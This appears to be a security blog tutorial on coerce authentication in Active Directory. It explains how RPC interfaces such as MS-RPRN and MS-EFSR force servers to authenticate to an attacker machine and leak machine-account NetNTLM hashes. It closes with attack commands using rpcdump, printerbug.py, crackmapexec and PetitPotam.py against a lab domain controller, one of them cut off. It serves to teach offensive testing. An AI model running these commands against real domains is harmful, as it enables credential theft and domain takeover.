Within the Active Directory environment, attackers use forced authentication and MitM strategies to perform various actions. That is why, on this occasion, we will enter the topic of Coerce Authentication. Throughout different posts we will explain the different ways to perform this technique, as well as how to link it with other attacks to elevate privileges in a domain.
“Coerce authentication” is a technique that, through calls to Windows Remote Procedure Calls (RPC), forces a service to authenticate against a machine. Using this technique, an attacker can force a vulnerable server to authenticate against a machine controlled by the attacker and thus obtain the hash of the machine account password in NetNTLM format.
A machine account on Windows networks refers to a unique identity associated with a device on the network. Machine accounts are essential for establishing communication and collaboration between devices within a network environment with Windows operating systems.
Once the hash of a machine account has been obtained, a range of possible techniques open up to take advantage of this authentication to impersonate the victim. Part of the criticality of this technique lies in the fact that a machine is the victim. For example, if this technique is used against a domain controller, it is possible to compromise the entire domain, thus increasing the criticality of said technique.
What is RPC?
RPC stands for Remote Procedure Call, which is a form of inter-process communication (IPC). This technology allows applications to send signals to each other to perform an operation.
In Windows environments, RPC is heavily used for many different services, such as scheduling tasks, creating services, configuring printers, configuring shared resources, managing encrypted data stored remotely, among others. …
Due to the nature of RPC as a remote vector, it attracts a lot of attention from a computer security point of view.
Main Vulnerable RPCs
Next, we proceed to list the main known vulnerable RPCs for the use of the “Coerce Authentication” technique.
It should be noted that, to exploit these RPCs, it is necessary to have a valid domain user account, although in the case of the RPC known as MS-EFSR, it is possible to run it without a user.
For this second case, where the exploitation was anonymous, Microsoft has considered this a vulnerability and has released security patches to correct it.
MS-RPRN is the Remote Procedure Call related to the remote printing system protocol.
Print Spooler from Microsoft is a service that manages print jobs and other printing-related tasks. An attacker controlling a domain user/computer can, with a specific RPC call, activate the spooler service of a target running it and cause it to authenticate to a target chosen by the attacker. This behavior is marked as “Wont Fix” from Microsoft and is enabled by default in all Windows environments.
Command: python3 rpcdump.py @dc.corp.lab | grep 'MS-RPRN'
Command: python3 printerbug.py “CORP/bob:
Command: crackmapexec smb dc.corp.lab -M petitpotam
Command: python3 PetitPotam.py -u “” -p “” -d “” attack_machine dc.corp.lab